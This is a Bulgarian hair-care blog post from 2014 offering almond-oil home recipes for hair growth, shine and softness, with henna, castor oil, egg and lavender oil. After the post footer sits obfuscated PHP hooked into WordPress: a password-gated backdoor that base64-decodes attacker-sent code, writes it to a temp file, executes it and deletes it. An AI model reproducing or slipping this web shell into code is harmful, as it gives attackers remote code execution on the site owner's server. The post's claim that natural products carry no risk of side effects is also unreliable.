Рецепти с бадемово масло за косата | Косопад

Рецепти с бадемово масло за косата

Бадемовото масло е едно от най- добрите масла за кожата и косата. Без съмнение, използването на натурални продукти е чудесно за красотата, тъй като няма опасност от странични ефекти и не пълни тялото ни с химикали. Бадемовото масло ще направи косата ни по- мека, по- хидратирана, по- блестяща и по- красива.

bademovo-maslo

ПОЛЗИ ОТ БАДЕМОВОТО МАСЛО ЗА КОСАТА

Съдържа много вещества – полезни мазнини, витамини, които са необходими за да бъде косата ни по- здрава и по- силна. Високото съдържание на витамин Е е особено важно за хидратирането и подхранването на косата.

Често се използва, за да расте косата по- дълга, силна и с блясък. Ако го нанасяме директно върху кожата на главата, може да облекчи сърбежа и елиминира пърхота. Също така помага и срещу косопад като подобрява кръвообращението.

КАК ДА ИЗПОЛЗВАМЕ БАДЕМОВОТО МАСЛО ЗА КОСАТА

Можем да го използваме по няколко начина. Първо, като масажираме с бадемово масло 15 минути скалпа и оставяме да kosa-baedmovo-masloподейства 45 минути. Измийте както обикновено.

Ако го искаме за растеж на косата, трябва да смесим:

3 с.л. бадемово масло
1 цвят от хибискус
3 с.л. рициново масло

Стоплете сместа и нанесете на кожата на главата. Масажирайте 10 минути и увийте главата с кърпа. Оставете да подейства 1 час и измийте нормално. Повторете 2 пъти в седмицата за 2 месеца.

За да направите косата по- блестяща, особено ако е къдрава, сложете няколко капки бадемово масло в ръката си, разтъркайте и нанесете по цялата коса. Ако връхчетата са отворени, трябва да ги намажете с маслото.

А ако искаме супер мека коса, можем да направим следната рецепта:

Смесете къна и вода и оставете да престои цяла нощ.
На следващия ден добавете 1 яйце и 3 с.л. бадемово масло и оставете да престои 10 минути.
Добавете няколко капки етерично масло от лавандула.
Нанесете сместа върху косата и оставете да подейства един час. После измийте със студена вода.

14. февруари 2014 16:19:48 от Надя Колева
Категории: Рецепти при косопад | Етикети: , , , , , | 1 коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}